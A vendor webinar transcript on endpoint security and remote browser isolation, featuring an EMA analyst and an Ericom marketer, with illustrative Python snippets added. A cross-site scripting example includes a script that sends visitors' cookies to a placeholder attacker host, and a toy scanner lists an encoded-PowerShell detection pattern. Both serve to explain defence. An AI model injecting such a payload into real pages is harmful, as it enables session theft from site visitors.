Webinar: Proactive Endpoint Security Through Threat Prevention

Featuring Steve Brasen, Research Director at Enterprise Management Associates (EMA), and Daniel Miller, Director of Product Marketing at Ericom Software

TRANSCRIPT


Raleigh Gould (Facilitator): Welcome and thank you for joining us for today’s webinar "Proactive Endpoint Security Through Threat Prevention". Our featured speakers are Steve Brasen, Research Director at Enterprise Management Associates and Daniel Miller, Director of Product Marketing at Ericom Software.

Steve’s career at EMA follows 20 years of "in-the-trenches" experience in IT systems support, engineering, and management for high-technology, telecommunications, and financial institutions.

Daniel has more than fifteen years of industry experience in corporate and product marketing, business development and product management for an array of technology services, hardware and software solutions – with a strong focus on cybersecurity.

Before I hand things over to today’s featured speakers, I want today’s audience to know that they will be concluding the presentation by taking your questions. Do feel free to log them anytime, using the Q&A functionality. Also, today’s event is being recorded and you will receive a follow-up email from EMA that will include the on-demand playback, a PDF of the speaker slides, and some additional resources from Ericom Software. So, I do hope that you will check that out. Now, I’d like to go ahead and turn today’s webinar over to our first featured speaker, Steve Brasen. Steve.

Steve Brasen: Thank you, Raleigh. Hello everyone and thank you all for joining us today for our discussion on enabling proactive endpoint security through threat prevention. Endpoint security is now broadly recognized as the most critical IT management process across all enterprise verticals and horizontals, and I am delighted to be able to share with you today some insights into the current state of enterprise requirements for endpoint security, as well as some of the most effective approaches to reducing risks while simplifying security administration practices.

First, here’s a quick look at the agenda for my portion of the presentation. We’ll start by reviewing the current and emerging end user requirements that are challenging IT organizations and security managers to meet compliance and SLA commitments.

Next, we’ll take a look at the rapidly evolving threat landscape and reveal the leading attacks that few organizations are currently prepared to prevent. In particular, we will take a deep dive into web-borne threats which are on the rise thanks to an increasing reliance on web-hosted SaaS solutions to drive business productivity. All this will help set the stage for us to identify responsible end user computing security practices that will ensure organizations are proactively preventing threats rather than reactively remediating breach events only after they have been introduced. And finally, I’ll sum up all the discussion with a few conclusions on enabling proactive threat prevention.

It should come as no surprise that we live in an IT-centric world. No modern-day business can survive without the creation, distribution and consumption of digital information. In fact, in every industry sector, the ability of businesses to meet organizational goals is broadly dependent on the use of a wide variety of IT resources, including applications, data, email, messaging, collaboration tools and many other business-hosted services. Because of this, IT support organizations in recent years have been fundamentally transformed from administering and repairing hardware platforms and operating systems on endpoint devices to being principally providers of IT software services. Millennials, who now constitute the majority of the global workforce, have been a key driver in enabling this transformation.

Today, end users have a much greater understanding of, appreciation for and dependency on digital services than ever before, and they are much more self-sufficient in managing their own devices than they were just a decade ago. As a consequence, workers are now demanding unprecedented access to business IT resources, and consider them an essential component of the success of their job tasks. Today’s workforces are not content merely with having access to enterprise applications, data and services; they expect IT resources to always be immediately available and intuitive to access.

Nowhere is this more visible than in organizations that utilize complex access and authentication processes that significantly reduce end user productivity. Every time a user has to stop what they are doing to remember or enter passwords or PINs or enable VPN connections or things like that, it distracts them from performing their job tasks. In fact, a distracted worker can take as much as fifteen minutes to refocus on their target tasks. During the course of an average day, this can take a significant toll on workforce productivity. Commonly, these unproductive implementations are called high-friction environments, because of the excessive number of time-consuming steps required for accessing essential IT resources.

Clearly, users should not have to jump through hoops just to get their jobs done. Also, organizations can directly correlate end user satisfaction with IT experiences. Organizations with low-friction environments are more likely to attract and retain quality, satisfied workers than those with high-friction environments, which in turn improves the reputation of IT service organizations. So, overall, user experiences with IT services should be considered a key driver for business productivity and profitability.

For IT managers, the emerging challenges are not just related to increased pressure from end users but also to increased complexities in the software hosting ecosystems. Just a decade ago, enterprise software was almost exclusively hosted on business servers or installed directly on endpoints. Today, business applications, data and services are also hosted on a wide variety of public and private environments. Most notably, according to EMA survey-based research, cloud-hosted Software as a Service or SaaS platforms have outpaced all other methods of application hosting. Since each hosting environment typically has its own separate process for enabling access, organizations have rapidly found themselves managing complex layers of access and security processes.

Our survey-based research results also indicated broad requirements for achieving regulatory compliance commitments. In total, 95% of businesses that responded to a recent EMA survey indicated that they needed to meet regulatory compliance. Not surprisingly, regulatory compliance aligns closely with particular industries, as you can see with our data broken out in this particular chart. For instance, GLB is heavily required for financial institutions, Six Sigma is common in manufacturing, and HIPAA compliance was noted by all survey respondents in healthcare industries.

While regulatory compliance encompasses a number of IT management processes, common to all of them is the need to ensure secure access to business applications and data. Unfortunately, the need to meet regulatory and business requirements for ensuring security of IT resources has become the primary challenge for IT support organizations. In fact, ensuring the security of IT services tops every list of IT management requirements that we investigated in our survey-based research: it was the most difficult to manage, the most time-consuming, the most expensive. And according to surveyed end users, it was the greatest inhibitor to workforce productivity.

The primary reason for this is related to the increased requirements for IT resource access that we’ve just been talking about. Access and security are in many ways diametrically opposed forces. The more access to services you provide, the more security you need to protect them; and the more security you add, the more friction you add to end user experiences.

In an attempt to satisfy both, many organizations have adopted one-dimensional approaches to IT security, such as basic virus protection software, that leave gaping holes in their security perimeter and are unable to address many of the emerging attack vectors.

But you don’t have to take my word for that, just pick up a newspaper. Hardly a week goes by that you don’t see an article about the latest shocking security breach. These aren’t just small companies but often large corporations that you would expect would employ only the highest level of security. In just the last year or so, Yahoo was breached twice, exposing access to more than a billion accounts; Uber had a data breach that exposed access to 57 million customers and drivers. In January of this year, the children’s toy manufacturer, VTech, was the victim of a cyber-attack that exposed the personal data of roughly 6.4 million children worldwide. And you are undoubtedly aware of the credit reporting agency, Equifax, which was hacked last year, exposing the personal information of 143 million people – including credit card numbers, social security numbers, birth dates, addresses and other personal identification information.

Some of the other companies that experienced major security breaches just in the last year or so include Google Mail, eBay, River City Media, VeriFone, Dun & Bradstreet, Saks Fifth Avenue, UNC Health Care, Arby’s, Chipotle, Sonic, Sabre, Brooks Brothers, DocuSign, Kmart, Blue Cross Blue Shield, Verizon, Hyatt Hotels, the U.S. Securities and Exchange Commission, and many, many others. Honestly, I don’t have time to list them all; they’re coming out weekly.

The damage that can be done here is real, and can be devastating to businesses of any size or type. Just a few of the potential risks include someone stealing one of your users’ identities, the loss of business reputation, significant profit loss and the loss of customers, and an inability to meet regulatory commitments – and any of these can result in direct financial losses, such as paying out fines and lawsuits.

While there isn’t time to discuss every single type of security risk, I want to cover just a few of the most insidious and impactful threats that have been emerging recently. What we have traditionally considered to be malware has been evolving. Hackers have figured out ways to work around traditional security technologies like first-generation sandboxes and security-based gateways. We call this "evasive malware" for its ability to evade the most common malware protection approaches. These attacks are constantly changing. Every time a security solution provider adds a new feature to address evasive malware, hackers change the approach to something else. It’s like trying to herd cats; they scatter in a hundred different directions.

Malware attacks are also becoming more targeted. Where in the past attacks were designed to cast a wide net and try to grab as many users as they could fool into drinking their poison, now they are being designed with a specific purpose. Now they may be targeting a particular company or a particular industry, or users with particular attributes. Since targeted attacks only affect a limited number of targets, it’s actually less likely that they will be identified as a threat by the malware solution providers.

Malware has actually become a big business unto itself. While most people think of a hacker as a teenager sitting in mom’s basement surrounded by home computing equipment and a bunch of stale pizza boxes, it’s actually become a very serious profession in many countries, particularly Russia and China. These businesses have even spawned Malware as a Service platforms that operate like a SaaS model to provide targeted malware attacks. With just a little bit of knowledge, any of you could, right now, go out onto the dark web and purchase a Malware as a Service solution that will allow you to customize an attack to perform any mischief you desire. For the right price, anyone can use Malware as a Service to steal secrets from business competitors or interfere in foreign government elections or influence financial markets. I know this sounds like the stuff of tinfoil-hat conspiracy theories, but it’s all actually happening. Seriously, it is well documented. Go out and Google it; I’m not lying to you.

Of course, I can’t talk about the evolving threat landscape without specifically discussing ransomware. Over the last two years, damage costs resulting from ransomware attacks increased a whopping 1500%. Clearly this has become the tool of choice for hackers. WannaCry has arguably attained the most infamous reputation. But this is actually only one of what can be considered a new class of ransomware threats that encrypt key system data until a fee is paid to unlock it and re-enable access. Other modern variations of ransomware include Petya, NotPetya, Locky, Crysis, Bad Rabbit, Nemucod, Jaff, Cerber, Spora, CryptoMix and Jigsaw.

The difference between these types of ransomware involves the methods used to trick users into downloading the encryption malware, the types of files on the endpoint devices that are being encrypted, and the methods used to collect payment for re-enabling access. What makes all these ransomware approaches particularly dangerous is that they are almost completely invisible to traditional signature-based antivirus malware protection solutions.

Actually, across the board, it is reasonable to say that signature-based malware products are no longer effective at preventing security breaches. Put simply, a signature is a characteristic of a piece of malware. It could be a change in a registry setting, a redirected web link, a modified code string, or something as simple as a text string in a startup script. Providers of this class of solutions monitor the internet for new malware threats, and then add a signature to an ever-growing library of known threats. When the computer runs the virus scan, it’s checking to see if any of those signatures appear on your system.
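
To make the mechanics concrete, here is a minimal sketch of how such a scanner works. The signature library below is a toy with two illustrative entries (one of them the well-known EICAR test string), not any real product’s database:

```python
import pathlib

# Illustrative "signature library": byte patterns seen in known malware.
# Real products ship databases with millions of entries, updated continuously.
SIGNATURES = {
    b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR": "EICAR-Test-File",
    b"powershell -enc ": "Suspicious-Encoded-Launcher",
}

def scan_file(path: pathlib.Path) -> list[str]:
    """Return the names of any known signatures found in the file."""
    data = path.read_bytes()
    return [name for pattern, name in SIGNATURES.items() if pattern in data]

# A brand-new ("zero-day") sample matches nothing, so it passes unnoticed
# until a vendor analyzes it and ships a new signature.
for f in pathlib.Path(".").glob("*.exe"):
    hits = scan_file(f)
    if hits:
        print(f"{f}: flagged as {', '.join(hits)}")
```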

The obvious problem here is the lag time between when the malware is first released onto the internet and when endpoint computers are updated with the new signature list. In most organizations, this time period can run between 60 and 90 days, while some endpoints are actually not updated for a year or more. During this lag time, these devices are susceptible to what are known as zero-day attacks, or malware for which no signature has yet been cataloged.

Even worse, though, is the fact that modern-day malware is designed to change or morph into new forms that have no consistent signature for malware protection to identify. Similarly, encrypted files, such as those used in ransomware, can’t be read by malware protection software, since the software doesn’t have the encryption key. Traditional signature-based anti-malware packages are a type of reactive security management, because they only identify threats that are known and documented. As with so many things in life, the real dangers actually come from unknown threats.

There’s another facet to security that should be acknowledged, which I can only describe as the human factor. No security technology ever created can prevent an authorized user from unwittingly giving away access to company data and resources. Let’s face it, most business employees are not particularly security conscious. Their goal is actually to complete their job tasks and security is often an inhibitor to their productivity. If security practices are impeding their ability to communicate with a client or provision materials or publish a report, they will most likely find a way to bypass the security to get their jobs done.

I will give you a great example of this, and one that you’re probably already familiar with. Last year we surveyed 200 business professionals to identify their security habits. 92% of the respondents admitted that they regularly used unsecured methods for sharing company data. For instance, they used a private Gmail or Yahoo email account or a standard Dropbox account to share files. Now what’s particularly shocking about this is the fact that 62% of those respondents also indicated that their business provides them with a secure method of data sharing. So clearly the majority of users opted to use the fast and easy solution to avoid the more complex security processes.

This is where the importance of user experience really plays a key role. It is essential for businesses to invest in secure access solutions that are also easy and intuitive for users to employ or, quite frankly, they’re just not going to use them. They’ll find some other way to get their job done, even if they have to bypass security.

Web browsers have proven to be a particularly weak link in security enablement. The increased reliance on SaaS and web-based software has substantially increased the amount of time business users spend in web browsers. Here again, the human factor is reducing the effectiveness of security policies. Attackers are exploiting users’ inherent laziness, their misplaced trust and – I’m sorry but there’s really no better way to say it – gullibility, to gain access to business systems. Users rarely change passwords, for example. They adopt easy-to-break passwords, and they utilize the same passwords for multiple accounts, making them very susceptible to "brute force" password-cracking attacks.

Phishing is an even more obvious exploitation of human weaknesses, as phone callers convince users to grant them access to their systems with no more than a few well-chosen words and a basic understanding of human psychology. Did you ever get a phone call from a "Windows service center" or something like that, informing you that your computer has a virus and that they can fix it? Do yourself a favor and just hang up. Just hang up! Otherwise, they will have you initiate a remote login session through your web browser, which they will use to install ransomware or some other insidious malware, and then charge you hundreds of dollars to clean it up.

Users also fall for phishing schemes with emails sent to their private email accounts. These emails may look like official messages coming from their banks or other professional institutions, but they embed links that point to malware sites or download malware – or, again, ransomware – onto your system.

Similarly, clickbait links on websites can actually be harboring access to malware. So you may want to think twice before clicking that link to the top ten things that will be revealed in the next season of Game of Thrones, or you’ll find that the next casualty of war will actually be your own desktop PC.

There’s no cure for the human factor. We’re all human; we all make mistakes. Even the most hardened security professionals sometimes do stupid things, whether they’ll admit it or not. In fact, I would argue that in the role of security management, it’s important to incorporate the human factor into security processes that will take steps to prevent users from being exploited.

There are also some insidious ways attackers exploit web browsers that do not involve the participation of users. A rapidly growing problem is the modification of browser security settings, or the alteration of browser shortcuts, to take you to malicious sites. Most commonly targeted are the most popular browsers: Chrome, Safari, Firefox, Edge, and Internet Explorer. Obviously if a hacker is going to take the time to write malware that will change the browser’s behavior, he’s going to pick one of the ones that are the most used.

Malware can also make changes to network proxy settings and registry keys that may alter the behavior of your web browsers. And within a business network, the problem can actually be compounded: a modified browser can actually be turned into a proxy that attacks other endpoints without the user’s knowledge. So a single compromised PC could spread malware attacks to every other PC on a local network.

Another problem is cross-site scripting attacks. Here’s how it works: a hacker injects malicious scripts into the HTML code on a website that would otherwise be considered trusted, like McDonald’s or Walmart – I’m not picking on anybody in particular, but something like that, that you would think would be reliable and safe. When an unsuspecting user accesses that page, they may inadvertently activate the malicious script, allowing the attacker access to browser-stored information, such as cookies or session tokens. The embedded scripts could also rewrite the actual HTML code for that page to redirect users to malicious pages or outright download malware. The upshot of all this is that we can no longer consider any website as safe or trusted. All websites must be considered suspicious, regardless of the organization hosting them.
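
As a simple illustration of the underlying flaw, here is a toy page-rendering function with the injection vulnerability and its one-line fix; the comment field and the cookie-stealing payload are hypothetical:

```python
import html

def render_comment_unsafe(comment: str) -> str:
    # VULNERABLE: user input is concatenated straight into the page's HTML,
    # so a script smuggled into a "comment" executes in every visitor's browser.
    return f"<div class='comment'>{comment}</div>"

def render_comment_safe(comment: str) -> str:
    # FIX: escape user input so the browser treats it as text, not markup.
    return f"<div class='comment'>{html.escape(comment)}</div>"

payload = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
print(render_comment_unsafe(payload))  # script tag survives intact
print(render_comment_safe(payload))    # rendered as harmless text
```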

An exploitation adjacent to cross-site scripting that is also on the rise has come to be known as cryptojacking. As you’re all probably aware, the use of cryptocurrencies such as Bitcoin, Ethereum, DigitalNote and Litecoin has been steadily increasing for the past five years. In fact, there are actually over 900 different types of cryptocurrencies currently active worldwide, representing a total capitalization of about $166 billion. It really is big business.

This has led to a new money-making opportunity for organizations that manage the currency transactions in the cryptocurrency blockchain. Cryptocurrency mining, as it’s come to be called, was intended to be performed on large computer systems. So for companies with large datacenters that have excess idle time, this turned out to be a great way to earn a little extra cash on the side; just have the computers mine cryptocurrency when they’re not otherwise in use.

However, some very enterprising individuals figured out that they can leverage consumer web browsers to do the mining computations for them, so they don’t actually need access to a powerful computer system at all. Basically, the company hosts a website that looks innocuous and safe and posts an executable that users unknowingly download. Most commonly today, these executables are delivered by leveraging JavaScript APIs. The executable then hammers away at your users’ computer processors to perform the cryptocurrency mining. As this is being performed on thousands or even tens of thousands of endpoints simultaneously, the cryptojackers are making a stunning amount of money with little or no investment.
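
To see why this hammers the processor, here is a toy Python version of the brute-force hashing loop at the core of proof-of-work mining; in a real cryptojacking attack, an equivalent loop runs as JavaScript in each visitor’s browser for as long as the page stays open:

```python
import hashlib
import itertools

def mine(block_data: bytes, difficulty: int = 5) -> int:
    """Brute-force a nonce whose hash starts with `difficulty` zero hex digits."""
    target = "0" * difficulty
    for nonce in itertools.count():
        digest = hashlib.sha256(block_data + str(nonce).encode()).hexdigest()
        if digest.startswith(target):
            return nonce  # one "share" of work done; the reward goes to the attacker

# Each call pegs a CPU core until a valid nonce is found; a cryptojacking
# script simply runs this forever, on every visitor's machine at once.
print(mine(b"example-block"))
```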

While this is certainly an unethical practice, cryptojacking, stunningly, is not actually considered illegal, which has only emboldened the cryptocurrency mining community. The result, however, is that your organization’s computers may be used to increase somebody else’s profitability at the expense of system performance and, by extension, workforce productivity.

All of these dangers we’ve been talking about point to a failure of traditional malware protection solutions, particularly because they are reactive in nature. This is resulting in direct, quantifiable costs to business budgets and performance. Breach events result in low-performing or unusable systems, the loss of sensitive business data, and the encryption of critical resources held for ransom. Resolving these problems takes valuable time away from IT administrators who would be more effective focusing on business improvements and new service introductions.

Additionally, while compromised systems are being remediated, the affected users are not being productive, which could affect service to customers or the completion of business critical tasks or the achievement of new market opportunities. The processes for cleaning defective systems can themselves be costly, since organizations may have to invest in multiple remediation tools, or hire expert consultants to clean these systems.

Rather than wasting time, money and effort to put out security breach fires, the better approach is to ensure that the fires never get set in the first place. This is what it means to be proactive.

To be proactive, an endpoint security solution must operate in real time. As we’ve seen, with a reactive solution such as a signature-based malware package, a threat is released into the public, and it is only after it has affected or impacted a large number of endpoints that the solution provider will create a signature for that threat and distribute it to customers. This is essentially closing the barn door only after the horse has bolted.

A proactive solution responds to both known and unknown threats by identifying questionable behaviors that an endpoint device may be exhibiting and responding to those threats in real time. This includes identifying and blocking access connections initiated directly by malware or unknowingly by users themselves. Also, these solutions may prevent the unauthorized sharing of business data or its distribution through insecure services like public email accounts. Any files downloaded from a remote source should be immediately scanned to ensure they are not harboring any malicious code or questionable links.

A real-time solution eliminates the possibility of zero-day attacks by immediately responding to risky behaviors, rather than waiting for a solution provider to update its malware catalog with new signatures. This is how you shut and lock the front door, proactively preventing attacks rather than systematically responding to them only after they have happened.

A comprehensive security portfolio will be multifaceted, achieving defense in depth by providing key layers of endpoint security. Secure methods of enabling access should be implemented for all IT services hosted in the enterprise software ecosystem, including internal environments as well as external public and private hosting environments.

At the same time, it is also important not to lose sight of the human factor in enabling a proactive endpoint security solution. Each layer of endpoint security should incorporate a low-friction approach to enabling user access, to ensure that users not only can use the system but will also want to use it. End user buy-in should be considered one of the critical measurements of success in the introduction of an endpoint security platform.

Given the universal business reliance on internet access and web services, all organizations should consider the enablement of secure browser access to be one of the key building blocks of an endpoint security portfolio. Any solution lacking in browser support must be considered incomplete.

If your organization is using a generic public browser without any additional protection, you should consider all browser connections that your users are making to be unsecured, and your business is at high risk of a security breach. Web access should be limited to approved sites only, either by blacklisting sites known to be dangerous or whitelisting sites that are expected, at least, to be trustworthy. But of course, remember that even trustworthy sites can never be completely trusted, so browser activity needs to be continuously monitored to prevent, detect and report risky behaviors.

An ideal approach to enabling secure browser access is called Remote Browser Isolation. This class of solutions ensures secure browser connections by executing the code of a webpage directly inside a secure virtual container, so web code never actually interacts with the operating system on the end user’s device. You can think of the container here as walling off the internet activity inside an impenetrable box, but the box has a clear window that allows total visibility into the website – without risk of inadvertently executing malware or exposing users to exploitation.

Remote browser isolation is centrally managed, so administrators can create policies and perform management tasks globally for all supported users, rather than, say, having to install and maintain scanners on every user’s physical device. Since remote browser isolation operates invisibly to end users, it creates a familiar user experience, allowing users to use and configure the browsers they are most comfortable with, and using them in the way that they prefer to use them.

While most organizations today focus on securing software in their hosting environments and on their endpoints, the most common and crucial gap continues to be securing web access. Remote browser isolation bridges that gap, ensuring secure access while empowering users with easy and reliable access to business IT resources that will boost their productivity.

To sum it all up, there continues to be an acceleration of rapidly evolving security threats. Attackers are finding new and creative ways to circumvent traditional methods of malware protection, particularly those that are designed to reactively respond only to known threats while failing to address unknown threats. In particular, web browser weaknesses are increasingly being exploited, along with the human factors of the users who employ them. And finally, proactive endpoint security solutions, including remote browser isolation platforms, stand out as providing comprehensive real-time protection while enabling low-friction end user experiences.

To help us dig deeper into that last note, I’ve asked Daniel Miller, Director of Product Marketing with Ericom, to join us today to share with us some of his insights into Ericom’s approach to remote browser isolation. Daniel, thank you very much for joining us today.

DM: Thanks, Steve, and thanks for having me. Hello, everyone. I’d like to first take some time to introduce Ericom to those of you who don’t know us. We’ve been a software house for about a quarter of a century now, based in Closter, New Jersey, with tens of thousands of customers around the world and a large network of partners. We’ve been in the secure remote connectivity space all this time. We have customers in security, government, and many other verticals, and they consider us an industry leader in that space.

So indeed, alluding to what Steve was mentioning about web browsers being a weakness that is susceptible to malicious exploitation, we really see in the marketplace that browsers are a major attack vector. For example, Kaspersky has shown that more than 50% of the malware penetrating corporations actually enters through the browser. What we also see is that specific browser vulnerabilities are discovered every day, focused on trying to penetrate and harm organizations using the browser as their entry point.

Now, very clearly what we see in most organizations today is that there are a lot of policies in place, and there’s a lot of defense-in-depth strategy. There are plenty of products available out there: URL filtering, secure web gateways, and various antivirus and other signature-based products.

But at the end of the day, when we look at this research, we see that the browser is a very serious attack vector and is not being addressed by the current products in the marketplace. The question is, "What needs to be done?" because obviously the existing perimeter defense that we have is not working as well as we want it to.

This is really, as Steve was mentioning, [the case for] remote browser isolation. The reason it is coming into play is that attacks are becoming much more sophisticated. The hackers are actually winning; they’re a step ahead of the organizations trying to protect themselves. Consider this whole array of multiple products, the need to keep them up to date and patched, and the need to make sure that every user coming back from a vacation is really current on all the latest antivirus updates. As Steve was saying, it can actually take between 60 and 90 days for every individual endpoint to receive all those updates. The reality is that this cat-and-mouse approach just doesn’t work.

Now, something else that was mentioned here is container technologies. Where before we were talking about sandboxing, we can see now in the marketplace that sandboxing is no longer a good enough protection mechanism because, as we said, hackers are more sophisticated and there is definitely malware out there that "knows" when it is sitting inside a sandbox and waits to execute until it looks like everything has settled.

The reality is that container technologies have really matured. Whether it’s Docker or other vendors in the marketplace, they enable you to spin up a server, an operating system, or an application in a fraction of a second and run it in a secure environment.

What it comes down to – and what we are trying to do with remote browser isolation and how we got there – is this: with everything we have protecting ourselves, browsing remains a main attack vector, even though, as Steve clearly said, it is one of the things that people do all day long and are comfortable with; they need to browse in order to do their work. So we want to make sure that this browsing happens as far as possible from the user, from the endpoint, and from the internal network.

I want to take you through one of the examples that Steve mentioned. I just want to take you through, maybe, a day in the life of a company, and then I’m going to dive into Ericom Shield, our secure remote browsing solution.

So, let’s look at any typical organization. This one in particular, we’ll call it ABC, a PR firm. We see a typical user who knows the rules, who follows the policy. They have a person who is responsible for making sure everyone is trained, that nobody clicks on what they shouldn’t…but, as usual, we see this day in, day out.

We actually had this today in the office. Somebody showed me a message from so-called "Facebook" – it was not; it was a kind of phishing attack. We get an email from somebody internal, somebody familiar [to us], and we look at it [wondering], does it look like a legitimate URL? Yeah, why not. And then we click and, a minute later, we are infected by ransomware. And not only that – it’s not just a personal thing, right? As we see, all this ransomware and other sophisticated malware actually spreads very, very quickly. It has this propagation mechanism built in.

So we actually impacted the whole organization. And the reality is that, although we have antivirus, firewall, URL filtering, intrusion prevention, all of that defense-in-depth, it just didn’t do the job.

So now we are facing the reality that the server is in lockdown and the business is impacted. And the latest information that I have is that around $7 million is the average cost of a ransomware attack, without even talking about reputation and all of that.

Now let’s look at the situation that happens when we do the same thing using Ericom Shield, which is a remote browser isolation solution. Yes, you can click on the link, but nothing is actually going to happen. The reason is that the browsing does not run on the endpoint itself but rather in a remote container sitting outside the organization and doing all the browsing for you – we’re going to dive into this in a second. Not only that, but we also discard this container, making sure that nothing can persist within it if any potential malware came through.

So, let’s just go through the process. Traffic goes through Ericom Shield. The user doesn’t know – for the user, it’s just transparent, this process – but the URL, because it’s an unknown URL, is opened in a container, which usually resides either in the DMZ or in the cloud, far away from the end user, the endpoint, and the internal network.

So, any ransomware, malware, or phishing attack is detained in this container – it’s not only that the code cannot actually impact [the endpoint]; it’s that the container is destroyed minutes after the session is over. As a result, there is no trace, nothing affects the user, and it cannot spread into the organization. In fact, the user is not even aware that there was potential wrongdoing. As Steve was mentioning, the human factor is something that we can preach and preach and preach [about] but, at the end of the day, cannot really control.

Now, let’s look more carefully at the product itself. Ericom Shield is a clientless solution. This means that nothing needs to be installed on the endpoint. It supports any regular HTML5 browser, which means that the user can continue to browse normally. It is a proxy-based solution, which means that the routing is done at the company level. So, the company is making sure that if you’re going to a whitelisted website, you’re going directly. If you’re going to an unknown website, by default it will route you to a secure browser, again, in the DMZ or in the cloud.
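
A rough sketch of that routing decision might look like the following; the list contents are hypothetical, and the real policy engine is of course Ericom’s own:

```python
WHITELIST = {"intranet.example.com", "payroll.example.com"}  # trusted: go direct
BLACKLIST = {"known-bad.example.net"}                        # block outright

def route(hostname: str) -> str:
    """Decide how the proxy handles a request, per the policy described above."""
    if hostname in BLACKLIST:
        return "BLOCK"
    if hostname in WHITELIST:
        return "DIRECT"           # browse normally
    return "REMOTE_ISOLATION"     # unknown: render in a remote container

for host in ("payroll.example.com", "random-site.example.org"):
    print(host, "->", route(host))
```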

Now, what we do with this information – we actually use a virtual browser to do all the heavy lifting, and we transfer the information back to the user as a virtual content stream. In reality, we are creating pictures, images, and mimicking the user experience. So it’s totally transparent to the user but, in reality, it’s made out of images. Therefore, there is no code that is running on the endpoint. I will show you a little proof in just a second.

When you look at the attack vector, we know that browsing is part of it, but there are also downloaded files – when you download files, you’re also exposing yourself to potential risk. Therefore, we’ve embedded a technology called CDR (Content Disarm and Reconstruction) inside our product to make sure that when you browse, you browse safely. We render the site into a virtual content stream, making sure that only images create your experience and you’re safe; but also, when you download files, the files are dismantled, cleaned and reconstructed to make sure that they operate normally but are clean of any potential viruses.
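
CDR implementations vary by vendor, but as a simplified sketch of the "disarm" idea: macro-enabled Office files are ZIP archives, so a document can be rebuilt without its embedded VBA payload. This illustrates the concept only, not Ericom’s implementation:

```python
import zipfile

def disarm_docm(src: str, dst: str) -> None:
    """Rebuild an Office document, dropping embedded macro code (vbaProject.bin)."""
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for item in zin.infolist():
            # Copy every part of the document except the VBA macro container.
            if "vbaProject" not in item.filename:
                zout.writestr(item, zin.read(item.filename))

disarm_docm("report.docm", "report_clean.docm")  # hypothetical file names
```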

Maybe just to show you a little example: When you use Ericom Shield versus the regular browser, there’s really no difference. You can use any browser, it looks totally the same, and it’s going to behave the same.

For lack of time, I won’t go into a live demo but all the hovering, all the browsing, all the touching, all the scrolling – everything works normally. But when you actually go and look under the hood, and you want to see what’s hiding behind any normal website, you see probably several thousand lines of code, with JavaScript and cross-site scripting and external URLs and advertising and third-party sourcing. So there is a lot of content that is actually coming in. Therefore, as Steve was mentioning, even an innocent-looking site like Walmart – again, not picking on anyone in particular – or a CNN site can actually bring in potential malware.

However, when you’re using Ericom Shield, as I explained, we are doing the browsing in the DMZ or in the cloud, and we are rendering the session in real time, creating only images. What you see here is actually the code, which is very limited. This is the Ericom code and this is pretty much the code saying, bring in those images.

So there’s no active code running on this machine right now, even though you are actually looking at the same website. From a user perspective, from the user experience, it looks exactly the same. But when you look under the hood, you realize that all the traffic is actually not happening on your device; everything is happening on the server, which can support hundreds of users.

Every session, every URL that you type, actually has its own dedicated container. So if you happen to have ten tabs open (and I know that all of us, including myself, are guilty of having ten, fifteen, twenty tabs open), each one of them is a different container, to make sure there’s no cross-contamination between containers. The magic is also that a few minutes after you’re done actively looking at this particular URL session, we actually destroy the container, making sure there’s no malware that can persist in the session. So this is how Ericom Shield actually makes browsing safe and transparent to the user.
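
As a rough sketch of this one-container-per-session pattern, assuming Docker is available and a hypothetical hardened browser image named hardened-browser exists (the real orchestration is Ericom’s own):

```python
import subprocess
import time
import uuid

def browse_in_container(url: str, session_ttl: int = 300) -> None:
    """Run one disposable browser container per URL, destroyed after the session."""
    name = f"session-{uuid.uuid4().hex[:8]}"    # unique container per tab/URL
    subprocess.run([
        "docker", "run", "--rm", "--detach",    # --rm: no trace once stopped
        "--name", name,
        "--memory", "512m", "--cpus", "0.5",    # slim, browsing-only resources
        "hardened-browser", url,                # hypothetical hardened image
    ], check=True)
    time.sleep(session_ttl)                     # session lifetime
    subprocess.run(["docker", "stop", name], check=True)  # container state is gone
```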

When you actually come out and look… Okay, I understand the concept, somebody’s doing the heavy lifting far away… What do I need to look for? What you need to look for, really, are the building blocks of a successful solution.

You need first and foremost to make sure the user experience is flawless.

And you want to go with a clientless solution, because you’re not looking for another project of installing software on ten thousand – or however many – end devices in your organization.

You want to make sure that the isolation is done remotely and not locally. There are some solutions in the market that believe they can do local isolation, hardening the operating system and running containers locally. But I say don’t do it; make sure that you keep the potential malware [as far] away as possible from you and from your network. We’re actually using Linux because we realized that Linux is more secure by design. Windows is still the most popular platform and everyone is trying to attack it. Linux is currently more protected, and we also do a lot of hardening on the Linux [platform], so we suggest going in that direction.

And last but not least, file sanitization. Downloading files – and cleaning them – is an essential part of any browsing experience. Your users will want to download files and if you allow this in your organization, you could open a Pandora’s Box. Make sure you have an integrated file sanitization solution.

Obviously, you can find more information on www.EricomShield.com. We will be happy to hear from you.

And just to summarize, if you remember what I showed you previously, as a little example. How do you think your "David" will behave in a similar situation? I mean, we’re all human, we all sometimes make the wrong click.

When you come to look at your existing defense-in-depth strategy, think hard. Are you really protected from web-borne threats? If you’re not currently using any type of remote browser isolation solution and you’re relying only on signature-type solutions and other types of solutions, spend some time, do some reading, and get familiar with this kind of security, because it can indeed change your security strategy. So thank you.

RG: Thank you, Daniel. If you have questions, you can log them now using the Q&A functionality. I am going to go ahead and jump in to the questions. Daniel, there have been a couple that have come in for you while you were presenting. The first is: "Would the secure virtual container introduce extra latency to the execution of the application being protected?"

DM: Right. As I said, we’ve been in this business for a quarter of a century, so we definitely know what we are doing in terms of software development. We are using containers, hardened containers, we’re using a lot of our in-house expertise, and first and foremost, user experience is everything in this kind of solution.

So, when we work with our customers now, the first feedback that we get is, "Hey, the solution performance is great." Because if the performance is lagging then obviously people will say, "Well, it’s an interesting concept, I like it, but I can’t really work like that." We actually use it internally; in the company, everyone is 100 percent under the policy of using Ericom Shield. People forget that we actually use it. So, latency as a concept, yes, it must exist, but we limit it to a very, very few milliseconds that make no difference for a normal browsing experience.

RG: Thank you for that clarification. The next question is, "Can you clarify how Ericom recognized that the process in the container was a bad attempt?"

DM: Okay. So, as I’ve said, it’s almost a philosophical approach, protecting against the known and the unknown. If we want to protect against the known, we are looking at signature[-based] and all types of other products, and obviously they’re not doing the job.

So, what we have decided is that it’s less important to say what’s good and what’s bad and therefore we just want to make sure we isolate, and that’s the concept. So, we don’t really "care" what’s coming through the session. If this website has not been whitelisted and it’s not been blacklisted along the way, then by default you are routed to the [virtual] browser, to the DMZ or to the cloud, and we will use virtual browsing to do the browsing.

